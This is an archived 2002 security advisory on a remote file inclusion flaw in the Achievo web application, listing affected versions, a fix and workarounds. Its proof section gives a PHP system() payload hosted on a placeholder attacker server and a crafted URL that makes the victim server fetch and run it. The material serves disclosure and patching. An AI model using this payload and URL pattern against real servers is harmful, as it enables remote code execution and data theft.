OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Jeroen Latour (jlatour_at_calaquendi.net)
Date: Thu Aug 22 2002 - 16:28:39 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Arbitrary code execution problem in Achievo

       0. Table of Contents

         1. Summary / Impact analysis
         2. Affected versions
         3. Workaround / Solution
         4. Proof of Vulnerability
         5. References

       1. Summary / Impact analysis

    Achievo is a web-based project management tool for business-environments. It
    has been found to be vulnerable to an arbitrary code execution attack.

    This vulnerability allows an attacker to execute arbitrary PHP code under
    the permissions of the web server. The only condition is that the attacker
    must be able to store code on a server that is accessible by the web server.
    Unless the web server is behind a firewall which blocks outbound connections
    from the web server, this is usually not a problem.

    The attacker does not need to have an account on the Achievo installation to
    be able to exploit this vulnerability.

       2. Affected versions

    The following stable versions are affected:
       Achievo 0.8.1
       Achievo 0.8.0
       Achievo 0.8.0 RC2
       Achievo 0.8.0 RC1

    The following development versions are affected:
       Achievo 0.9.1
       Achievo 0.9.0
       Achievo 0.7.3
       Achievo 0.7.2
       Achievo 0.7.1
       Achievo 0.7.0

       3. Workaround / Solution

    A new stable version, Achievo 0.8.2, has been released which fixes this
    problem.
    A new development version should follow soon.

    To work around the problem, remove the references to $config_atkroot in the
    include_once statements at the top of
    tk/javascript/class.atkdateattribute.js.php.
    This will include the requested files at the default location: two directories
    higher.
    An alternative solution is to replace the chdir() call by:

    $config_atkroot = '../../';

    at the top of class.atkdateattribute.js.php

       4. Proof of Vulnerability

    The problem exists in atk/javascript/class.atkdateattribute.js.php, a
    PHP script which generates JavaScript code. This file contains a series of 5
    include_once statements, to load configuration data and function libraries.
    The location of these files are apparantly set by the $config_atkroot, a
    variable which isn't set anywhere in the script.

    This allows the attacker to specify $config_atkroot as a GET/POST/COOKIE
    variable and instruct the server to open a text file on a web server, and
    interpret that file as a PHP script.

    For example: we create a text file containing the following line:

    <?php system('ls'); ?>

    and save this in a webroot somewhere (i.e. http://attacker/ls.txt).

    We then open our browser and pass this url, followed by a question mark, on
    to class.atkdate.attribute.js.php:

    URL:
    http://victim/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attacker/ls.txt?

    The output of the 'ls' should be in the output of the PHP script. Note that
    the script is executed several times: once for every include_once statement.

    This is a relatively harmless example which only works on UNIX, Windows
    installations require a <?php system('dir'); ?>. A malicious attacker can
    insert any code in the text file, instructing the server to read
    configuration or password files, execute database queries, or even remove
    files (within the limits of the web server's permissions).

       5. References

    Achievo can be found at:
         http://www.achievo.org/
    Achievo 0.8.2, which fixes this vulnerability, is available at:
         http://www.achievo.org/download/